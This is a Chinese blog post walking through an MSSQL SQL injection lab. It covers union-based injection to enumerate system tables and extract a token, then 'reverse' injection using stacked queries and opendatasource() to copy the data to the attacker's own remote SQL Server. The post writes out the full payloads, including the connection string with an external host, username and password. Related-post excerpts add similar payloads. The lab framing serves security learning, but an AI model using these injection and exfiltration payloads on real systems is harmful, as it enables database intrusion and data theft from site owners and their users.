MSSQL-反弹注入(zkaq靶场)

最新推荐文章于 2024-05-29 14:49:58 发布
最新推荐文章于 2024-05-29 14:49:58 发布
阅读量3.3k 收藏 2
点赞数 4
分类专栏: web知识 文章标签: sqlserver 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52585514/article/details/124498510
版权

MSSQL就是sql server 他跟mysql进行注入的方式有所不同

这里写两种方法

1.联合查询注入

首先mssql使用联合查询时,是不能用select 1,2,3这样填充的,必须要和表中的数据类型一样,但是可以使用null来填充

首先来猜字段

order by 3时正确,order by 4时错误

所以字段数为3
在这里插入图片描述

然后进行猜数据类型。先

?id=1’ union all select NULL,NULL,NULL – qwe
在这里插入图片描述

回显正常

挨个测试数据类型

?id=1’ union all select 1,‘w’,‘w’ – qwe

猜测得出数据类型为,int ,char,char
在这里插入图片描述

然后进行查询系统表,mssql的系统表是sysobjects,里面包含了数据库中的所有表

其中只有三个字段: id,name,xtype 刚好对应靶场中的int,char,char的数据类型。

其中xtype只有两个参数,S和U

S代表系统自带表,U代表用户自建表

?id=1’ union all select id,name,NULL from sysobjects where xtype=‘U’ – qwe

得到
在这里插入图片描述

其中id对应的是这个表的id,name就是这个表的名字

然后记住表的id,来查询这个表的字段名

这个id是用来连接syscolumns表的

syscolumns表的结构跟sysobjects是不一样的

?id=1’ union all select NULL,name,NULL from syscolumns where id=1977058079 – qwe

得到
在这里插入图片描述

flag多半是在token

然后就是正常的查询了

?id=1’ union all select NULL,NULL,token from admin – qwe
在这里插入图片描述

得到flag

2.反弹注入

利用数据外带的方式来进行注入,就是将数据库的插入的自己的数据库里

但是首先你要有公网ip和mssql服务器

可以去香港云(http://www.webweb.com/)注册,60天免费

这里利用opendatasource()函数

语法:
OPENDATASOURCE(provider_name,init_string)

provider_name 注册为用于访问数据源的OLE DB 提供程序的PROGID的名称 MSSQL的名称为SQLOLEDB

init_string 连接字符串 连接地址、端口、用户名、密码、数据库名 server=连接地址,端口;uid=用户名;pwd=密码;database=数据库名称
即:
opendatasource(‘sqloledb’,‘server=连接地址,连接端口;uid=用户名;pwd=密码;database=库名’).库名.权限(dbo).表名 <查询语句>

但是想要导出的记录要和自己建的导入的表的字段数相同

数据库端口默认为1433

然后传到自己建好的数据库服务器内
要使用堆叠注入,mssql以’;'号为结束,遇到;后开始新的语句

?id=1’; insert into opendatasource(‘sqloledb’,‘server=SQL5095.site4xxx.net,1433;uid=DB_14DCxxx_a94_admin;pwd=nsqvcf96310;database=DB_14DC259_a94’).DB_14DC259_a94.dbo.zhiyuan select id,name from sysobjects where xtype=‘U’ – qew

在自己的数据库里得到
在这里插入图片描述

然后再用相同的方法得到字段名

?id=1’; insert into opendatasource(‘sqloledb’,‘server=SQL5095.site4xxx.net,1433;uid=DB_14DCxxx_a94_admin;pwd=nsqvcf96310;database=DB_14DC259_a94’).DB_14DC259_a94.dbo.temp select id,name from syscolumns where id=1977058079 – qew

得到
在这里插入图片描述

好,然后查询就行了

?id=1’; insert into opendatasource(‘sqloledb’,‘server=SQL5095.site4xxx.net,1433;uid=DB_14DCxxx_a94_admin;pwd=nsqvcf96310;database=DB_14DC259_a94’).DB_14DC259_a94.dbo.temp select NULL,token from admin – qwe

得到flag
在这里插入图片描述

v2ish1yan
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MSSQL反弹注入靶场
weixin_45540609的博客
04-21 551
方法1——报错注入 查找sql注入点 2'order by 4 -- asd,知道字段数有3个,且有一个数据表叫news 2' union all select 1,'aaa','bbb' from news -- asd 联合查询注入发现第2,3个字段是字符类型 2' union all select id,name,null from sysobjects where xtype='U' -- asd 2' union all select id,name...
MSSQL-反弹注入
weixin_45634365的博客
03-04 345
一、MSSQL反弹注入的使用场景 MSSQL其实就是SQLServer。 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,造就了新颖独特的攻击思路。 在注入攻击中常常遇到这些问题: (1)明明是SQL注入点却无法注入 (2)注入工具猜解的速度异常缓慢 (3)错误提示信息关闭 (4)无法返回注入结果 为了解决上述问题,比较好的方法是使用反弹注入技术。 反弹注入:将查询到的数据插入到其他数据库,可以复制大量的数据。 二、快速搭建一个MSSQL环境 MSSQ
MSSQL注入反弹注入
最新发布
2401_84488651的博客
05-29 886
database=DB_14DC2E5_wlb').DB_14DC2E5_wlb.dbo.teener select table_name from information_schema.tables-- qwe 页面显示正常,插入数据成功。id=1%27and%20-1=-1 order by 4--%20wqe 页面非正常显示。id=1%27and%20-1=-1 order by 3--%20wqe 页面正常显示。id=1%27and%20-1=-1--%20wqe 页面正常显示。
[zkaq靶场]SQL注入--MSSQL反弹注入
wwxxee
05-08 430
MSSQL反弹注入 使用场景 明明是SQL注入点,但是使用工具注入缓慢,或者错误提示信息关闭,无法返回注入结果等。较好的解决办法就是使用反弹注入。 核心 反弹注入的核心就是opendatasouce()函数。 将查询的数据结果插入到我们自己的数据库中。 opendatasource 为了方便理解,可以看理解为 ‘使用opendatasource函数将当前数据库查询的结果发送到另一数据库服务器中。 语法: OPENDATASOURCE(provider_name,init_string) provider_n
mssql反弹注入
笔墨稠思
11-25 379
1.反弹注入原理 通过opendatasource()将查询到的数据发送到mssql服务器 2.反弹注入使用条件 是否存在堆叠注入 注意事项: 1.mssql 对字段的数据类型要求严格,测试回显点时,可以使用null来代替字段,之后对null进行替换,找出争取的数据类型 2.在使用联合查询时,推荐使用union all 进行查询 3.之前在mysql中查询表和字段时使用的系统自带库 information_schema在mssql中也存在,仍然可以使用,也可以使用其系统自带表,sysobjects查询表名,
MSSQL--反弹注入
qq_68233961的博客
08-15 232
MSSQL--反弹注入
mssql-jdbc-10.2.0.jre8.jar jre11,jre17
03-18
java jdbc方式连接mysql的驱动,来自MS官网下载地址。 https://docs.microsoft.com/zh-cn/sql/connect/jdbc/download-microsoft-jdbc-driver-for-sql-server?view=sql-server-ver15
mssql-jdbc-8.2.0.jre8-API文档-中文版.zip
07-13
赠送jar包:mssql-jdbc-8.2.0.jre8.jar; 赠送原API文档:mssql-jdbc-8.2.0.jre8-javadoc.jar; 赠送源代码:mssql-jdbc-8.2.0.jre8-sources.jar; 赠送Maven依赖信息文件:mssql-jdbc-8.2.0.jre8.pom; 包含翻译后...
mssql-jdbc-8.2.0.jre8-API文档-中英对照版.zip
07-13
赠送jar包:mssql-jdbc-8.2.0.jre8.jar; 赠送原API文档:mssql-jdbc-8.2.0.jre8-javadoc.jar; 赠送源代码:mssql-jdbc-8.2.0.jre8-sources.jar; 赠送Maven依赖信息文件:mssql-jdbc-8.2.0.jre8.pom; 包含翻译后...
mssql-jdbc-6.2.1.jre7-API文档-中文版.zip
06-26
赠送jar包:mssql-jdbc-6.2.1.jre7.jar; 赠送原API文档:mssql-jdbc-6.2.1.jre7-javadoc.jar; 赠送源代码:mssql-jdbc-6.2.1.jre7-sources.jar; 赠送Maven依赖信息文件:mssql-jdbc-6.2.1.jre7.pom; 包含翻译后...
mssql-jdbc-6.4.0.jre8.jar
06-23
DBC Driver 6.4 在每个安装包中包含三个 JAR 类库:mssql-jdbc-6.4.0.jre7.jar 、mssql-jdbc-6.4.0.jre8.jar 和 mssql-jdbc-6.4.0.jre9.jar 。 JDBC Driver 6.4 专门适用于各种主要 Java 虚拟机且受到这些虚拟机的...
mysql后台注入靶场源码.rar
04-21
该资源为存在漏洞的网站源码,学习web安全的小伙伴可以用来搭建环境做测试用 方法: 上传所有文件到空间根目录下,运行http://你的域名/install进行安装 安装过程遇到的数据库用户名和密码可以咨询空间你的空间商 不需要会员功能可以删除member目录 安装完成后更改admin目录为你的后台目录名,更改后的访问地址为 http://你的域名/修改的后台目录名 安装完成后请及时删除install目录
探究mssql注入第一课 本地搭建mssql注入环境
07-29
探究mssql注入第一课 本地搭建mssql注入环境
18、注入篇--反弹注入(MSSQL
WX公众号-小白学安全
04-10 746
MSSQL MSSQL基础 MSSQL是指微软的SQLServer数据库服务器 每个库都会自带有sysobjects表,其中有三个字段 name 当前数据库下的所有表名 id 相当于表名的标识 xtype 字段 中 U 代表用户创建的表名,S代表系统创建的 每个库都会自带有syscolumns表,其中有两个字段 name 每个表的字段名 id 对应sysobjects表中id字段 反弹注入 原理 原理:将目标站点中查询到的数据结果 传到攻击者的数据库注入条件
MSSQL注入——反弹注入
m0_55854679的博客
02-18 905
文章目录MSSQLSQL server】反弹注入使用场景快速搭建MSSQL环境MSSQL数据库反弹注入语句分析OPENDATASOURCE函数练习第一种方法——联合查询注入第二种方法——反弹注入+堆叠注入 MSSQLSQL server】反弹注入使用场景 与mysql大同小异,注入思路相同,但用到的函数等不同。 反弹注入 => 注入的手法(偏门)oob => 把查询到的数据插入外部的数据库(公网ip),反弹注入实际就是把查询出来的数据发送到我们的MSSQL服务器上。 快速搭建MSSQL
MSSQL注入反弹注入
MSB_WLAQ的博客
10-06 425
MSSQL反弹注入原理 依靠 opendatasource 函数,把查询出的数据发送到MSSQL服务器上。 MSSQL反弹注入使用场景 用香港云快速搭建一个MSSQL环境 可以用临时邮箱注册免费的试用60天。 免费60天的试用,过期了就换个邮箱。 1.猜数据时为什么不能用数字 根据了MSSQL的特性,虽然不能用数字但可用null和字母填充 2.MSSQL有系统自带库吗 有 为master.dbo.sysdatabase 3.反弹注入满足的条件 能否堆叠查询,...
网络安全从入门到精通(第六章-4)MSsql注入 —— 反弹注入
划水的小白白
02-05 2023
本文内容: ~MSSQL反弹注入使用场景 ~快速搭建一个MSSQL环境(骚姿势) ~MSSQL反弹注入语句解析 ~MSSQL实战注意
mysql反弹注入平台_MSSQL注入--反弹注入
weixin_30284287的博客
02-11 210
明明是sql注入的点,却无法进行注入,注射工具拆解的速度异常的缓慢,错误提示信息关闭,无法返回注入的结果,这个时候你便可以尝试使用反弹注入反弹注入需要依赖于函数opendatasource的支持,将当前数据库中的查询结果发送到另一数据库服务器中。判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and ex...
Unable to locate package mssql-server
01-28
在Ubuntu系统下,如果出现 "Unable to locate package mssql-server" 的错误提示,可能是因为没有正确添加Microsoft SQL Server的软件源。为了解决这个问题,你可以按照以下步骤进行操作: 1. 打开终端,使用root权限登录系统。 2. 运行以下命令,下载并添加Microsoft SQL Server的软件源: ```shell curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add - curl https://packages.microsoft.com/config/ubuntu/18.04/mssql-server-2019.list | sudo tee /etc/apt/sources.list.d/mssql-server.list ``` 3. 运行以下命令,更新软件包列表: ```shell sudo apt-get update ``` 4. 运行以下命令,安装Microsoft SQL Server: ```shell sudo apt-get install mssql-server ``` 5. 在安装过程中,你需要设置一个SA(System Administrator)账户的密码。请根据提示输入密码并确认。 6. 安装完成后,运行以下命令,启动SQL Server服务: ```shell sudo systemctl start mssql-server ``` 7. 运行以下命令,检查SQL Server服务的状态: ```shell sudo systemctl status mssql-server ``` 如果服务状态显示为"active (running)",则表示SQL Server已成功安装并正在运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

v2ish1yan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值